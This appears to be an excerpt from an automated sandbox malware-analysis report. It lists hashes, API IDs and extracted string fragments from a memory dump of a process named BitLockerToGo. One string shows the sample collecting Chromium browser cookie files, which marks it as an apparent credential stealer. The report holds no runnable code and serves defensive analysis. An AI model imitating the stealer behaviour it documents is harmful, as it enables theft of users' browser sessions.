                • Instruction ID: e2f345403edde2fd88b1dee3d32429dfb8856c1b7bc8c8f46051b4d228cc93ae
                • Opcode Fuzzy Hash: e6212235c42533e534e3f55510c78357616fbb52f896657a4a58cd93f7427da8
                • Instruction Fuzzy Hash: 47D05E34253050EBEB684F01ECCDF033E3AEF86722F100158B50A052E5C2719852DB94
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: Clipboard$CloseDataLongOpenWindow
                • String ID: I$K$L$N$g$s$v$x$y$z${
                • API String ID: 1647500905-1390982499
                • Opcode ID: 5b2671d52fa55024691a7d91a08831ad2d0a9c7ed8278fe4180729310642b7da
                • Instruction ID: 08abe1bd9b4de8853e4e6d2e16e19482ea091a2a4be0fef779be49f09a20d314
                • Opcode Fuzzy Hash: 5b2671d52fa55024691a7d91a08831ad2d0a9c7ed8278fe4180729310642b7da
                • Instruction Fuzzy Hash: 6761AFB0518740CFCB21DF28D484706BFF0AF16314F158A98E8CA8B755E374E919CBA2
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: "$"$-3%$<=$B^SH$R6%$SN^D$X6%$r4%$r:%$sTN_
                • API String ID: 0-2800417422
                • Opcode ID: 5628e7a806676944be39838006a2b713dc32e3cf4ee9c4e229b782865398c104
                • Instruction ID: 66f33e557e599cf38e22f8c38a517c1f92cfca69d434e919e2428c2cf163a2fe
                • Opcode Fuzzy Hash: 5628e7a806676944be39838006a2b713dc32e3cf4ee9c4e229b782865398c104
                • Instruction Fuzzy Hash: E7420F71A18381DFD714CF28D89071ABBE2AFC9355F048A2DE8998B391C730DE55CB46
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: .$.$0$[$false$null$true${
                • API String ID: 0-1639024219
                • Opcode ID: b9079f0b16895c5d9822c3946244a804a24db2dfac1b01e9219df41e17997089
                • Instruction ID: 5f941d33147e9a041018da65b965c7af8bf65f3da29059c9c864ec03ef622959
                • Opcode Fuzzy Hash: b9079f0b16895c5d9822c3946244a804a24db2dfac1b01e9219df41e17997089
                • Instruction Fuzzy Hash: 040215F4624306DBD7105F25EC45726BBE4AF50308F198538F9898B253EB75D938CB92
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: .(.#$119,$5 f$60&+$7C%$?2)$$f8 <
                • API String ID: 0-1608121542
                • Opcode ID: 4912b52f9251e12f83892cc01b378c24c790a5cda85dcb8ef813d24937b8a47e
                • Instruction ID: 0ed84e316e59a30713c350075ca57e21e88f6eeb904909b0b59d12304f97cf03
                • Opcode Fuzzy Hash: 4912b52f9251e12f83892cc01b378c24c790a5cda85dcb8ef813d24937b8a47e
                • Instruction Fuzzy Hash: 81E1A0B19183418FC318DF28C49176EFBE2ABD5304F148A2DE4D987392DB34E959CB86
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: !#$$#/`$+(/($Jz`T$bJMs$qv"<$uJr{
                • API String ID: 0-2180438874
                • Opcode ID: c53e36e70595c7d0e5fb1d0fab81e3dfdd3b06ab5c1a29d87aaf79f55a446548
                • Instruction ID: af08714d726a81cc75ab1e3e32b7430aacfa589829a900a4c662b7c815df71a1
                • Opcode Fuzzy Hash: c53e36e70595c7d0e5fb1d0fab81e3dfdd3b06ab5c1a29d87aaf79f55a446548
                • Instruction Fuzzy Hash: 13C176B05183818FD325CF19C4907ABFBE1BF8A304F188A5DE4D99B352C7749996CB92
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: (0%$/1%$L0%$\eg$b}$r4%
                • API String ID: 0-2575072577
                • Opcode ID: 8ff0ce2fdd40607b50829fe7d02bdee1b9694cae75a59221773a3d3773607f10
                • Instruction ID: 3fb1c278ec5c7a3df5318b9ff92ce3635d8df63c3719cbc40ca6ff816c62d1ee
                • Opcode Fuzzy Hash: 8ff0ce2fdd40607b50829fe7d02bdee1b9694cae75a59221773a3d3773607f10
                • Instruction Fuzzy Hash: 0AC184B1618341DFD324CF14D890B6BBBF2FB8A315F01892DE9898B291D771D959CB82
                Strings
                • r$, xrefs: 0024E867
                • [info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 0024DDDD
                • @u, xrefs: 0024DD47
                • "$, xrefs: 0024E116
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: "$$@u$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$r$
                • API String ID: 0-4224994035
                • Opcode ID: f7f879b7c95bc336678cd115ed19da1791bda40630b9a6ddbe4b0e661de92c6e
                • Instruction ID: 66c7158110720a67a9b0517313a49374910d45957682889baa1c0be302b71b68
                • Opcode Fuzzy Hash: f7f879b7c95bc336678cd115ed19da1791bda40630b9a6ddbe4b0e661de92c6e
                • Instruction Fuzzy Hash: 76F1E072618351CFD318CF28D89072AB7E2FF99304F19892CE4998B391D735D856CB82
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: WU$^B$_U
                • API String ID: 0-591993885
                • Opcode ID: f5cce98d37f9300e7232675f16e458f61ec7f157a326afb0bb40fa3bebe4f372
                • Instruction ID: 7330b716a9e14c8b909c787286d2290bc67e0d7df8109b3a719c76421c98b2cb
                • Opcode Fuzzy Hash: f5cce98d37f9300e7232675f16e458f61ec7f157a326afb0bb40fa3bebe4f372
                • Instruction Fuzzy Hash: 94E17D75620B02CFC324CF28C8D0A66B3F2FF49705B5989ADD8868B761D735E859CB54
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: x$yc$|
                • API String ID: 0-2517623061
                • Opcode ID: 1634e6f8be28813485449604081cfeed78bd88990914e336d6a42798db564ad5
                • Instruction ID: 3f8565a13c153aca888d7caacbb08d66ca44aec4e4984e40c1dadd889378765f
                • Opcode Fuzzy Hash: 1634e6f8be28813485449604081cfeed78bd88990914e336d6a42798db564ad5
                • Instruction Fuzzy Hash: 7771BCB195D3928BD311CF29C55074AFFE2AFD6750F188A8CE4D42B295C37A9849CB82
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: LM$Th$Ub
                • API String ID: 0-1443290983
                • Opcode ID: 1e6ba5f1f27b63463106d93cea135fb217e2320985e0f007c3307df0bf4931a5
                • Instruction ID: 82cf9f45f9e0f6ac7ba1fb15939eef0201ea48ce20403f6703ac73285d822bce
                • Opcode Fuzzy Hash: 1e6ba5f1f27b63463106d93cea135fb217e2320985e0f007c3307df0bf4931a5
                • Instruction Fuzzy Hash: AC6120B05183429BC314CF28D49065BBBF1FF89358F008A1DF8E99B2A1E374D955CB86
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: #v
                • API String ID: 0-554117064
                • Opcode ID: 5f423d43b39f0339839e8aa4b71fbb7a5d232a437f3349af81528ee1282aa21a
                • Instruction ID: 04c62c158ac0bf780f5282c96b37b03bb714dd96254f42473673c391ba7521de
                • Opcode Fuzzy Hash: 5f423d43b39f0339839e8aa4b71fbb7a5d232a437f3349af81528ee1282aa21a
                • Instruction Fuzzy Hash: 38C148712107818BD328CF28C890776BBE2BF56315F18865CD8A79F7C1DB75A859CB48
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: "$"
                • API String ID: 0-3758156766
                • Opcode ID: cda4f5acd26b871cbcca2202356b46d30e563c0f34db992341330c9d98c9f970
                • Instruction ID: 465a939ed3d7d32a429a604b766508d20c3200220c3df5645c57f01f0d750f83
                • Opcode Fuzzy Hash: cda4f5acd26b871cbcca2202356b46d30e563c0f34db992341330c9d98c9f970
                • Instruction Fuzzy Hash: C80213716287129FC714CE28C4A476FB7E5AB84311F58892DFC9A8B381D774DD1C8B8A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: _#
                • API String ID: 0-2071307381
                • Opcode ID: 5576d93de2284f43aa1d731a0ecdc1f23c15680e3d11c9a175b688618ee6cebb
                • Instruction ID: abeb114c01f4bc8392134c103d42ee1a18b235e2263fd4280aa94cf96923ed53
                • Opcode Fuzzy Hash: 5576d93de2284f43aa1d731a0ecdc1f23c15680e3d11c9a175b688618ee6cebb
                • Instruction Fuzzy Hash: 4E52ABB16187428FC725CF25C080667FBE2BF88314F188A6EE4DA87651D778FA56CB41
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: String
                • String ID:
                • API String ID: 2568140703-0
                • Opcode ID: d9637dee86136349e50bec95eecfcfc9cba95c94a0ff4ee3551c9d291091e922
                • Instruction ID: 0718773e7586ac32a7199987cfaf7e76989689e9245b9bdd4e5f311b8d0a2826
                • Opcode Fuzzy Hash: d9637dee86136349e50bec95eecfcfc9cba95c94a0ff4ee3551c9d291091e922
                • Instruction Fuzzy Hash: 4D91B1B16052428FC304EF3CD492796BBE1FFA9305F15492CE48A8B395E731A864CB46
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: ,
                • API String ID: 0-3772416878
                • Opcode ID: 3e48fb93da189c62b0e05bf7dbf58001b919ecc4b59bd6c036f71f8d2a52db2b
                • Instruction ID: 561164f4251015191a15f0278cebb30272d1e8c8728701b82b5f296edb5b0f1e
                • Opcode Fuzzy Hash: 3e48fb93da189c62b0e05bf7dbf58001b919ecc4b59bd6c036f71f8d2a52db2b
                • Instruction Fuzzy Hash: AEB13B71209386AFD315CF68C84465BFBE4AFA9304F448A5DF49897382D371DA28CB96
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: _#
                • API String ID: 0-2071307381
                • Opcode ID: d0804c45f23e18b3a38dd5b1ba2fc293b18eaab1db2388ba06dba68e56258075
                • Instruction ID: a595cca8c7bc2bdeb24abb9ad1e52e26d405010e8dd9664e5bb78cc431a19ee5
                • Opcode Fuzzy Hash: d0804c45f23e18b3a38dd5b1ba2fc293b18eaab1db2388ba06dba68e56258075
                • Instruction Fuzzy Hash: 3541E432B182624BCB14CE3DCC5027ABAD39FC5245F1EC679E8C9DB386E578DA105790
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: D
                • API String ID: 0-2746444292
                • Opcode ID: 9d3bef12303775df3518319dda976acff0ea8c95714b4407b5f5ba98082eee63
                • Instruction ID: ab1a70f56a2e1bfa07745c57c187098ddaa135589b8505db59c5494c4eaf8bb6
                • Opcode Fuzzy Hash: 9d3bef12303775df3518319dda976acff0ea8c95714b4407b5f5ba98082eee63
                • Instruction Fuzzy Hash: BB6112B01183819FE324DF01D8A57ABBBF0FB86748F10590CE5C91B291D7B59845CF86
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: 6t(
                • API String ID: 0-2705413176
                • Opcode ID: 99cfc5d43baf08b33595eea13df153f84881922beadd4ca94d9dbb26b73c0388
                • Instruction ID: 2d3a1dcf7dd5e4aebd8aea3abb4a6043615d381a4092ff6037e167c668fd42a4
                • Opcode Fuzzy Hash: 99cfc5d43baf08b33595eea13df153f84881922beadd4ca94d9dbb26b73c0388
                • Instruction Fuzzy Hash: 33C012387846008B8308CE14E890872B3B6EB8E2007903228844ED3750C620E8818A25
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: F0%
                • API String ID: 0-521456340
                • Opcode ID: 6bf818793fe7ea43f53efbba46ee7723104e850771b06cd9c4fe9d0b54174a70
                • Instruction ID: e663095ffd25bd98e5f607c14556ec2312047ed8442629279f906ada6d44062b
                • Opcode Fuzzy Hash: 6bf818793fe7ea43f53efbba46ee7723104e850771b06cd9c4fe9d0b54174a70
                • Instruction Fuzzy Hash: D7B092A0D159218285016A2028220BDA0295A0B25AF442020E40A62002AA28E22A498F
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 13b0dbc37ce5dd985f5196187134fc832c5ca2fd16ff455f0f4b77a56554114a
                • Instruction ID: 8e5056dbc79181b297d671aa51aaf0851e5e45d91c12de921f635b1b8886eee1
                • Opcode Fuzzy Hash: 13b0dbc37ce5dd985f5196187134fc832c5ca2fd16ff455f0f4b77a56554114a
                • Instruction Fuzzy Hash: 845205B16287128BC725DF1CD8802BAB3E1FFD4314F15492DE9C69B385DB35A865CB82
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a6701004c874a998607f8c90a1ee46f1f533f7853715775656e75c825a51a4ac
                • Instruction ID: ae43f66217bc4b6b59366318c95a48fbf08e315fc2417ad8265e3e7235dc608f
                • Opcode Fuzzy Hash: a6701004c874a998607f8c90a1ee46f1f533f7853715775656e75c825a51a4ac
                • Instruction Fuzzy Hash: DF52233651C290DFDB408F38FA693667BE4BB4A302F49C8B9D5D4832A2D3B9C954CB51
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 27eb6b1ab59a9bd93b79acd7978dc1ec68636393047082fe3443230a8fe15e01
                • Instruction ID: 21cf684180b05c54753e6a5f02d49a0bc7675c08565aac5eb43dafcda6d89d09
                • Opcode Fuzzy Hash: 27eb6b1ab59a9bd93b79acd7978dc1ec68636393047082fe3443230a8fe15e01
                • Instruction Fuzzy Hash: 9042E2B56183428FD714CF18C894B2ABBE6FFC4318F188A2DE4958B391D735E855CB92
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9b9adb391483e5d5fbcee3a82491cd67babeae1c66e1fa1634ee41824145e059
                • Instruction ID: 1b889e8ae511fc5bac140701d2a1f2844bcd92dc4f9e179a3e7636d7ebc57979
                • Opcode Fuzzy Hash: 9b9adb391483e5d5fbcee3a82491cd67babeae1c66e1fa1634ee41824145e059
                • Instruction Fuzzy Hash: A3321332A18652CFC714CF28D49465ABBF2FF8A304F1A896DE89997351C731ED91CB81
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80e89722e92610840e5d293fa9b68fed828d9a1d68404160044e842a9668256e
                • Instruction ID: 6633f40d434999083a14676efc85240ba2e07c1ff0ef1ccbe9e8afce25781d1a
                • Opcode Fuzzy Hash: 80e89722e92610840e5d293fa9b68fed828d9a1d68404160044e842a9668256e
                • Instruction Fuzzy Hash: 334243B0524B518FC368DF28C59066ABBE1FF55310FA08A6EE6978BB90D375F854CB10
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 012a25b2b8837a9f8b54d7ec27b3d7c69ca192a67525f2d31eed0e864a1e916b
                • Instruction ID: d7a564436d5bc6246d93b63ab4257a27b5770b8f45503e99adf5bae1239f4ed4
                • Opcode Fuzzy Hash: 012a25b2b8837a9f8b54d7ec27b3d7c69ca192a67525f2d31eed0e864a1e916b
                • Instruction Fuzzy Hash: 640222B1618342CFC718CF24D49166FB7E2AF9A305F08486DE8C687392E635D95DCB92
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b2a5755e2a59bbed780f8d4f3a0a68a16a3bd155a12886517b918d5d612f8f63
                • Instruction ID: 88f5cddcc6be876f806a954dba606627b76f52aae40b42b1ee4774d491513a30
                • Opcode Fuzzy Hash: b2a5755e2a59bbed780f8d4f3a0a68a16a3bd155a12886517b918d5d612f8f63
                • Instruction Fuzzy Hash: 3D02C3766083419FCB14CF29C88571BBBE6AFC9304F09886DF888CB352D675D855CB96
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 03b09ce9045f1b8077d3ceeb41a4b7681c88737f6c998fbbf5fa05c3a5fd5f0d
                • Instruction ID: 7728b7447b0236e195a8b41c5f372950874e4e3acb58f16cc323bd0fe0a73c54
                • Opcode Fuzzy Hash: 03b09ce9045f1b8077d3ceeb41a4b7681c88737f6c998fbbf5fa05c3a5fd5f0d
                • Instruction Fuzzy Hash: 1CF12135628652CFC724CF29D89465AFBF2FF8A304F19896DE89987351C731E991CB80
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3124e0819a2085de69f70e902e192de122f5c6ed167216d3281c8f8f1617fff0
                • Instruction ID: 51d3482f2732dcc4fa86d1ff63745da6816f9762cb5691f12e0ef6602852c910
                • Opcode Fuzzy Hash: 3124e0819a2085de69f70e902e192de122f5c6ed167216d3281c8f8f1617fff0
                • Instruction Fuzzy Hash: 3CA1B4716143029BD725CF28C890A6FB7E2FF84704F55896CE88A8B351EB30DC95CB91
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d3029d97b47de93c534ad0e2e7f75eb7e45104ab41e8833860401a598dd74089
                • Instruction ID: d416b74d9d6218ddc159ee1dc4d045fe455af8aa9d56053da4fb57bb1f08e65f
                • Opcode Fuzzy Hash: d3029d97b47de93c534ad0e2e7f75eb7e45104ab41e8833860401a598dd74089
                • Instruction Fuzzy Hash: D3A1D172A243128BC716CF18C890A6AB3E6FF94754F19852CE9969B350D730ECA1CBD1
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 213a3293fb712bfeb4d89947be2a45a76ef7a6a22d7f22ace4f7a6c71636ae3f
                • Instruction ID: 1446815572b18dd944728ad209efe5ed2352a14cd6f228159fa1bb72b82c7801
                • Opcode Fuzzy Hash: 213a3293fb712bfeb4d89947be2a45a76ef7a6a22d7f22ace4f7a6c71636ae3f
                • Instruction Fuzzy Hash: 91A1DE701147818FDB25CF29C0D4B22BBF1AF16305F18898DD8D69F786C7B9A819CB65
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7479a205f0e3c677d06c9749efa991ccc7a6381667ca03fd99f67494d5b36b2c
                • Instruction ID: 72a01b1a3dd710a4f9c7e43b268c4d9d360d20b0a5add8155fb1c6848a2bbb21
                • Opcode Fuzzy Hash: 7479a205f0e3c677d06c9749efa991ccc7a6381667ca03fd99f67494d5b36b2c
                • Instruction Fuzzy Hash: AAA1BB701147818FDB288F24C494B22BBF1BF16305F18899DC8D69F786C7B9A819CBA5
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 77897a978281c6e62a68f60fbda1dd05a9de1741ab7495d51e2174554a496b31
                • Instruction ID: 137b7588f924467820da2fa36fcee884c46118c035e2d4d5a302e8d6ab9e52f9
                • Opcode Fuzzy Hash: 77897a978281c6e62a68f60fbda1dd05a9de1741ab7495d51e2174554a496b31
                • Instruction Fuzzy Hash: 89A1F675604B41CFC325CF38C490B92B7E2FF9A315F194A6DD8A68B792D735A849CB40
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e242761953c6edb62a277dc0dd629e6b080038304fd9b688f905b25d1d98600
                • Instruction ID: 5312d087b2b2bbdbe13b730fb06ad45aea7367f7dcb8feb9194218007107a830
                • Opcode Fuzzy Hash: 8e242761953c6edb62a277dc0dd629e6b080038304fd9b688f905b25d1d98600
                • Instruction Fuzzy Hash: DD619EB55087548FE310DF29D89035BBBE1BBC8358F044A2DE5E987391E379DA488F92
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 96a1be833e4fedff33bf1373e799afc0129166239b85ee2cd1ddc06d011e721b
                • Instruction ID: e88a824bc39d0cd5d984acaeabb89a423a003c56b55b1e8d7efdc6d230fce201
                • Opcode Fuzzy Hash: 96a1be833e4fedff33bf1373e799afc0129166239b85ee2cd1ddc06d011e721b
                • Instruction Fuzzy Hash: A651F6B0504205DFD704AF68FD0971BBBA1FF40318F088639E85AD66A1E775E978CB86
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a816a7074a83e9da863b80ff68aeb835d7d9ccb8d586ae41367d58cc7121a1a
                • Instruction ID: e30c1c044e484fa918e16f86e97acdaf59d4be9297d86fa9814061ff1bc1a052
                • Opcode Fuzzy Hash: 2a816a7074a83e9da863b80ff68aeb835d7d9ccb8d586ae41367d58cc7121a1a
                • Instruction Fuzzy Hash: D151E4B1A183018FC718CF28C89062AB7E2FFC9314F19862DE88A9B395D734ED15CB55
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 76717db16c56d4573ae44454bcc0e6b4fdfb5f2597146a6669d1fab15071936c
                • Instruction ID: ac19fc569e5835849dfb7eb30b33f4a62556ea8e5d3dc6ddbe9681ecaaed4b02
                • Opcode Fuzzy Hash: 76717db16c56d4573ae44454bcc0e6b4fdfb5f2597146a6669d1fab15071936c
                • Instruction Fuzzy Hash: C65169701107418FDB258F24C4D4B22BBF1BF06305F18899CD89A9B786CBB5E859CBA5
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1da209b17b01932e3b05467e7b292eb36af367a4f5526fb592f0d38a06d77a98
                • Instruction ID: 5f6f569198193ac5e0cdb82c034a0dec99fa37c0ccb1a575d8c664fca4621058
                • Opcode Fuzzy Hash: 1da209b17b01932e3b05467e7b292eb36af367a4f5526fb592f0d38a06d77a98
                • Instruction Fuzzy Hash: B14148B2928B298BD3259F54C8C0726F7D8EF61318F094669E8C947283EB71DC24C752
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
